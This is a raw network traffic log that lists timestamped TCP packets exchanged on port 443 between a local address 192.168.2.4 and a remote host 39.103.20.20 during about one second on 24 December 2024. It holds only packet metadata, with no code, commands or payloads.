Dec 24, 2024 15:12:34.720390081 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.721498013 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.721538067 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.721544027 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.721563101 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.721592903 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.722877979 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.722939968 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.723784924 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.723853111 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.724668026 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.724752903 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.726161003 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.726234913 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.730993986 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.731158972 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.731846094 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.731924057 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.733134985 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.733267069 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.733567953 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.733710051 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.751914978 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.756078005 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.756184101 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.756954908 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.757010937 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.773642063 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.773741961 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.774501085 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.774555922 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.775388002 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.775439024 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.776793957 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.776878119 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.780487061 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.780570984 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.781404018 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.781550884 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.863782883 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.863861084 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.864624023 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.864675045 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.865458965 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.865540981 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.866307020 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.866388083 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.867217064 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.867330074 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.868051052 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.868153095 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.868927002 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.868983984 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.869788885 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.869839907 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.871520996 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.871582985 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.871722937 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.909926891 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.909981966 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.910376072 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.910446882 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.911292076 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.911345959 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.912190914 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.912249088 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.913033009 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.913085938 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.913850069 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.913939953 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.914738894 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.914798021 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.915688038 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.915781975 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.917318106 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.917386055 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.918164015 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.918220997 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.923152924 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.923275948 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.923554897 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.923605919 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.924606085 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.924680948 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.925096989 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.925160885 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.947969913 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.948030949 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.948544979 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.948651075 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.949630022 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.965595961 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.965678930 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.965912104 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.966097116 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.966825962 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.966917038 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.967936039 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.967994928 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.975053072 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.975274086 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.975531101 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.975610018 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.979418993 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.009480953 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.055484056 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.055720091 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.055874109 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.055946112 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.056771994 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.056849957 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.057635069 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.057739973 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.058484077 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.058536053 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.060157061 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.060214043 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.060226917 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.060282946 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.061899900 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.061961889 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.062733889 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.062788010 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.063627005 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.063684940 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.078197956 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.102169991 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.102262020 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.102699041 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.102808952 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.103518963 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.103611946 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.104372025 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.104438066 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.105385065 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.105449915 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.106133938 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.106201887 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.107772112 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.107868910 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.108795881 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.108863115 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.109510899 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.109580994 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.110454082 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.110548019 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.113065958 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.119535923 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.119600058 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.119796991 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.119869947 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.120640993 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.120724916 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.121725082 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.121782064 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.140532970 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.140639067 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.140736103 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.140841007 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.145684958 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.157532930 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.157670975 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.157983065 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.158046961 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.158885002 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.158967972 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.159682989 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.159730911 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.167155981 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.167329073 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.167638063 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.167700052 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.177431107 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.251280069 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.251384020 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.251655102 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.251743078 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.253011942 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.253091097 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.253407955 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.253554106 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.254268885 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.254394054 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.256009102 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.256098986 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.256855965 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.256957054 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.257836103 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.257903099 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.258600950 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.258662939 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.259479046 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.259537935 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.298254967 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.298348904 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.298779964 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.298855066 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.299520969 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.299619913 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.300391912 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.300456047 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.302087069 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.302208900 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.302995920 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.303086042 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.303837061 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.303919077 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.304788113 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.304867029 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.305586100 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.305654049 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.306461096 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.306530952 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.311400890 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.311491013 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.312078953 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.312252998 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.312880039 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.312956095 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.313788891 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.313888073 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.332587957 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.332729101 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.332961082 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.333053112 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.349827051 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.349898100 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.350155115 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.350259066 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.351075888 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.351149082 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.352807045 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.352869034 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.360804081 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.360884905 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.361500978 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.361604929 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.417992115 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.444026947 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.444120884 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.444180012 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.444231987 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.444828033 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.444878101 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.446500063 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.446547985 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.447366953 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.447422981 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.448579073 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.448635101 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.449263096 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.449311972 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.450177908 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.450226068 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.450911999 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.450958967 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.451837063 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.451884985 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.490540028 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.490714073 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.491549015 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.491610050 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.492425919 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.492477894 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.493196964 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.493244886 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.494210958 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.494259119 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.494915962 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.494971037 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.495985985 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.496035099 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.497519970 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.497574091 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.498377085 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.498436928 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.499222040 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.499267101 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.507615089 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.507688999 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.508865118 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.508913994 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.509767056 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.509823084 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.510641098 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.510689020 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.527981043 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.528038979 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.529099941 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.529153109 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.544094086 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.544159889 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.545164108 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.545214891 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.545990944 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.546050072 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.546866894 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.546915054 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.555654049 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.555712938 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.556849957 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.556899071 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.635974884 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.636092901 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.637038946 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.637140989 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.637944937 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.638004065 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.638776064 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.638829947 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.639656067 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.639710903 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.640548944 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.640604019 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.641525030 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.641582966 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.642275095 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.642329931 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.643130064 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.643182993 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.644824982 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.644881964 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.671084881 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.683041096 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.683109045 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.683646917 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.683701992 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.685343027 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.685390949 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.686212063 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.686264992 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.687130928 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.687186003 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.688005924 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.688056946 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.688863039 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.688916922 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.689723969 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.689774990 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.690643072 CET	443	49740	39.103.20.20	192.168.2.4
